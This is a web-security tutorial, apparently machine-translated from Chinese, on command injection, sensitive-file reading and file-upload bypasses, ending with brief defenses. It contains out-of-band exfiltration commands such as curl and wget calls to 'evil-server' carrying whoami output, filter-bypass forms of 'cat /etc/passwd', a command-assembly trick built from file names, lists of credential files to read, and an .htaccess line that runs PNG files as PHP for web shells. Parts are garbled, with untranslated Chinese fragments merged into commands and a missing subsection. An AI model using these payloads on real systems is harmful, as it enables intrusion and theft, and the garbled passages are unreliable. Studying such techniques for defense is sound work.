Shulou(Shulou.com)06/01 Report--

This article mainly introduces the relevant knowledge of command injection techniques in WEB security, the content is detailed and easy to understand, the operation is simple and fast, and has a certain reference value. I believe you will gain something after reading this article on command injection techniques in WEB security. Let's take a look.

Command injection

3.5.1. Brief introduction

Command injection usually refers to a vulnerability caused by Web applications splicing system commands on the server.

This type of vulnerability usually occurs in situations where external programs are called to perform some functions. For example, some Web management interfaces configure hostname / IP/ mask / gateway, view system information, shut down and restart, or some sites provide functions such as ping, nslookup, sending mail, converting pictures, and so on.

3.5.2. Common hazard function

3.5.2.1. PHP

● system

● exec

● passthru

● shell_exec

● popen

● proc_open

3.5.2.2. Python

● system

● popen

● subprocess.call

● spawn

3.5.2.3. Java

● java.lang.Runtime.getRuntime (command) .exec

3.5.3. Common injection mode

● semicolon division

● | | & split

● | Pipe character

●

% d0%a0 line feeds

Resolution of ● back quotation marks

● $() replace

3.5.4. No echo skill

● bash bounces shell

● DNS out-of-band data

● http out-of-band

Curl http://evil-server/$(whoami)

Wget http://evil-server/$(whoami)

Using sleep or other logic to construct Boolean conditions when ● is out-of-band

3.5.5. Common bypass methods

3.5.5.1. White space bypass

●

< 符号 cat /bin/ls ● 连接符 cat /etc/pass'w'd ● 未定义的初始化变量 cat$x /etc/passwd 3.5.5.3. 长度限制绕过 >

Wget

> foo.

> com

Ls-t > a

Sh a

The above method is to redirect the write command through the command line, then write the command to the file by time sorting through ls, and finally execute it directly under the Linux terminal. To create the file, you need to add commands before the redirect symbol. Here you can use some short commands such as w, [, (using ls / usr/bin/?). View) if you do not add a command, you need Ctrl+D to end, which is equal to the redirection of the standard input stream. In php, when you use functions such as shell_exec to execute system commands, there is no standard input stream, so you can create a file directly.

3.5.6. Common symbols

3.5.6.1. Command delimiter

● 0a / 0d /

/

●

● & / & &

3.5.6.2. Wildcard character

● * 0 to infinity of any character

●? An arbitrary character

● [] A character in parentheses, e.g. [abcd]

● [-] all characters in the encoding order

● [^] A character that is not in parentheses

3.5.7. Defense

Disable the corresponding function when ● is not in use

● tries not to execute external applications or commands.

● does the format check of input.

All shell metacharacters in the ● escape command

Shell metacharacters include # &; `, | *? ~ ^ () [] {} $

3.6

File reading

Consider reading files that may have sensitive information.

Sensitive files under the ● user directory

.bash _ history

.zsh _ history

.profile

.bashrc

.gitconfig

.viminfo

Passwd

Configuration file for ● application

/ etc/apache2/apache2.conf

/ etc/nginx/nginx.conf

Log files for ● applications

/ var/log/apache2/access.log

/ var/log/nginx/access.log

Sensitive files under the ● site directory

.svn / entries

.git / HEAD

WEB-INF/web.xml

.htaccess

Special backup files for ●

.swp

.swo

.bak

Index.php~

...

Cache of ● Python

_ _ pycache____init__.cpython-35.pyc

3.7

File upload

3.7.1. File type detection bypass

3.7.1.1. Change request bypass

Some sites only detect the file type at the front end, and this type of detection can directly modify the network request bypass. Similarly, some sites only check the information in HTTP Header at the back end, such as Content-Type, and this check can also be bypassed by modifying network requests.

3.7.1.2. Magic detection bypass

Some sites use file headers to detect file types, which can be bypassed by adding the corresponding bytes before the Shell. The header bytes of several common file types are shown in the following table

3.7.1.3. Suffix bypass

Some services can only determine the file type based on the suffix, upload information or Magic Header, which can be bypassed at this time.

Php due to historical reasons, some interpreters may support suffixes that conform to regular / ph (p [2-7]? | t (ml)?) /, such as php / php5 / pht / phtml / shtml / pwml / phtm, which can be tested when uploading php files is prohibited.

The jsp engine may parse suffixes such as jspx / jspf / jspa / jsw / jsv / jtml, while asp supports suffixes such as asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp {80-90}.

In addition to these bypass, other suffixes can also cause problems, such as vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini, etc.

3.7.1.4. System name Bypass

In the Windows system, upload index.php. Will be renamed to. You can bypass the suffix check You can also try.

Index.php%20, index.php:1.jpg index.php::$DATA, etc. In the Linux system, you can try to upload the name index.php/. Or. / aa/../index.php/. The file of

3.7.1.5. .user.ini

During php execution, in addition to the main php.ini, PHP scans INI files in each directory, rising from the directory where the PHP file is executed to the web root directory (specified by $_ SERVER ['DOCUMENT_ROOT']). If the executed PHP file is outside the web root directory, only that directory is scanned. Options for schemas other than PHP_INI_SYSTEM can be defined in .user.ini, so you can use files with .user.ini and non-php suffixes to construct a shell, such as auto_prepend_file=01.gif.

3.7.1.6. WAF bypass

Some waf only deal with a part of the data for performance reasons in the writing process, so you can bypass its processing function by adding a lot of junk data.

In addition, the Waf and Web systems deal with boundary differently, so you can use the wrong boundary to complete the bypass.

3.7.1.7. Competitive upload bypass

Some servers use the method of saving and then deleting illegal files. In this kind of server, you can upload a file that will generate Web Shell repeatedly and try to access it. After many times, you can get Shell.

3.7.2. Attack skill

3.7.2.1. Apache rewrites GetShell

Apache can consider uploading .htaccess depending on whether redirection is allowed.

The content is:

AddType application/x-httpd-php .png php_flag engine 1

You can do php scripts with files with png or other suffixes.

3.7.2.2. Soft link to read any file

When uploading compressed files that will be unzipped, you can consider uploading files with symbolic links. If the server is not protected, you can achieve the effect of reading arbitrary files.

3.7.3. Protective skills

● uses whitelists to restrict the types of uploaded files

● uses more stringent file type checking

● restricts Web Server's resolution of uploaded folders

This is the end of the article on "what are the skills of command injection in WEB security?" Thank you for reading! I believe you all have a certain understanding of "what are the command injection skills in WEB security". If you want to learn more, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.